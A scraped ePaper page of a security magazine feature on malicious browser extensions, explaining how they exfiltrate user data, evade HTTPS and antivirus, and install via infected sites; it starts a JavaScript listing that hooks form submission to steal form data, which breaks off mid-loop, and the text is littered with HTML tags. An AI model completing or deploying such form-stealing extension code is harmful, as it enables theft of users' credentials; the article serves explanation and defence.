Spying on the browser: dissecting the design of malicious extensions
17.06.2015 Views
Share Embed Flag

Spying on the browser: dissecting the design of malicious extensions

Spying on the browser: dissecting the design of malicious extensions

Spying on the browser: dissecting the design of malicious extensions

SHOW MORE
SHOW LESS
ePAPER READ
DOWNLOAD ePAPER
secniche.org

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

START NOW

FEATURE<br />

exploited to take c<strong>on</strong>trol <strong>of</strong> <strong>the</strong> entire<br />

system. Related work <strong>on</strong> securing extensi<strong>on</strong>s<br />

has been d<strong>on</strong>e to show <strong>the</strong> process<br />

<strong>of</strong> <strong>design</strong>ing secure extensi<strong>on</strong>s free from<br />

vulnerabilities. 5 Of course, <strong>malicious</strong><br />

extensi<strong>on</strong>s do not care that extensi<strong>on</strong>s<br />

should be secure.<br />

Generally, <strong>the</strong> aim <strong>of</strong> <strong>malicious</strong> extensi<strong>on</strong>s<br />

is to steal sensitive data from<br />

<strong>the</strong> user and transfer it to an attackerc<strong>on</strong>trolled<br />

domain. Malicious extensi<strong>on</strong>s<br />

exploit <strong>the</strong> trust model used by <strong>the</strong><br />

<strong>browser</strong> to set a communicati<strong>on</strong> channel<br />

between <strong>the</strong> <strong>browser</strong> and <strong>the</strong> website.<br />

Usually, this process is completed when<br />

a sessi<strong>on</strong> is created with a target website<br />

hosted <strong>on</strong> third-party servers. The<br />

point is that <strong>malicious</strong> extensi<strong>on</strong>s are not<br />

protected by HTTP running over SSL.<br />

Most users have a false sense <strong>of</strong> security<br />

when websites use HTTPS. However,<br />

this is not justified because HTTPS<br />

protects users <strong>on</strong>ly from transport layer<br />

attacks. Ir<strong>on</strong>ically, HTTPS actually<br />

protects <strong>the</strong> <strong>malicious</strong> sessi<strong>on</strong> from such<br />

attacks. HTTPS preserves <strong>the</strong> integrity<br />

<strong>of</strong> data, but because <strong>the</strong> <strong>malicious</strong><br />

code is within <strong>the</strong> <strong>browser</strong>, data can be<br />

manipulated even before it enters <strong>the</strong><br />

network layer.<br />

Why doesn’t anti-malware s<strong>of</strong>tware<br />

catch <strong>malicious</strong> extensi<strong>on</strong>s? Malicious<br />

extensi<strong>on</strong>s are not scanned by antimalware<br />

soluti<strong>on</strong>s because extensi<strong>on</strong>s<br />

are c<strong>on</strong>sidered to be secure comp<strong>on</strong>ents<br />

by default. We have seen some <strong>browser</strong><br />

plug-in integrity checkers that detect<br />

<strong>the</strong> presence <strong>of</strong> secure and insecure<br />

plug-ins based <strong>on</strong> <strong>the</strong> versi<strong>on</strong> informati<strong>on</strong>.<br />

However, for extensi<strong>on</strong>s, this versi<strong>on</strong><br />

scanning technique is not effective<br />

because extensi<strong>on</strong>s are not proprietary<br />

code used by vendors or s<strong>of</strong>tware companies.<br />

As a result, <strong>malicious</strong> extensi<strong>on</strong>s are<br />

not impacted by antivirus soluti<strong>on</strong>s.<br />

The basic operati<strong>on</strong> is:<br />

1. A user visits a site that has been<br />

infected with <strong>malicious</strong> code.<br />

2. The <strong>malicious</strong> site installs a <strong>malicious</strong><br />

extensi<strong>on</strong> into <strong>the</strong> user’s <strong>browser</strong>.<br />

3. Within <strong>the</strong> <strong>browser</strong> <strong>the</strong> <strong>malicious</strong><br />

extensi<strong>on</strong> snoops <strong>on</strong> a user’s <strong>browser</strong><br />

activity.<br />

4. Informati<strong>on</strong> collected by <strong>the</strong> <strong>malicious</strong><br />

extensi<strong>on</strong> is sent to an attacker’s<br />

remote server.<br />

Listing 2: Wrapper functi<strong>on</strong> to steal data in forms<br />

window.document.<strong>on</strong>submit = scan_forms;<br />

//Scan <strong>the</strong> document forms<br />

functi<strong>on</strong> scan_forms() {<br />

var forms = c<strong>on</strong>tent.document.getElementsByTagName(‘form’);<br />

for(var i=0; i

logo

products

Resources

Company

Terms of service
Privacy policy
Cookie policy
Cookie settings
Imprint
Change language
Made with love in Switzerland
© 2024 Yumpu.com all rights reserved

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!